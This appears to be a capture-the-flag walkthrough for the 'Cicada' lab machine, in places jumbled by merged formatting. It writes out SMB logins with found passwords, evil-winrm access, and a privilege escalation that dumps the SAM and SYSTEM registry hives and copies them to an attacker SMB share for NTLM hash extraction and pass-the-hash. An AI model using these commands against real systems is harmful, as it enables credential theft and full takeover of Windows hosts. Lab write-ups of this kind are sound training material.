Cicada
smbclient \\\\10.10.11.35\\DEV -U 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
--------------------------------------------------------------------
cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
--------------------------------------------------------------------
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
----------------------------------------------
user.txt: 1d12de2c4162688e2ee9ba080c707d96
-----------------------------------------------------
reg save hklm\system c:\Temp\system
copy C:\Temp\sam \\10.10.16.53\share\sam
copy C:\Temp\system \\10.10.16.53\share\system
evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341Initial Access
Enumerate SMB Shares:
Used
smbclientto list accessible shares:Found the
HRshare and accessed it:
Found Credentials:
Discovered a file containing credentials:
Enumerate Users:
Used
nxcto enumerate users via RID brute-forcing:Identified users like
michael.wrightson,david.orelious, andemily.oscars.
Authenticate as
michael.wrightson:Used the found credentials to authenticate:
Explore SMB Shares:
Found additional shares and accessed the
devshare:
Found New Credentials:
Discovered credentials for
emily.oscars:
Authenticate as
emily.oscars:Used
evil-winrmto authenticate:
Privilege Escalation
Check Privileges:
Ran
whoami /privand foundSeBackupPrivilegeandSeRestorePrivilegeenabled.
Dump SAM and SYSTEM Hives:
Created a
Tempfolder and dumped the hives:
Transfer Files Using SMB Server:
Set up an SMB server on the attacking machine:
Copied the files to the SMB share from the target machine:
Extract NTLM Hashes:
Used
pypykatzto extract the hashes:Found the NTLM hash for the
Administrator:
Authenticate as
Administrator:Used
evil-winrmwith the NTLM hash:
Retrieve the Root Flag:
Navigated to the
Administratordesktop and read theroot.txtfile:
Last updated
Was this helpful?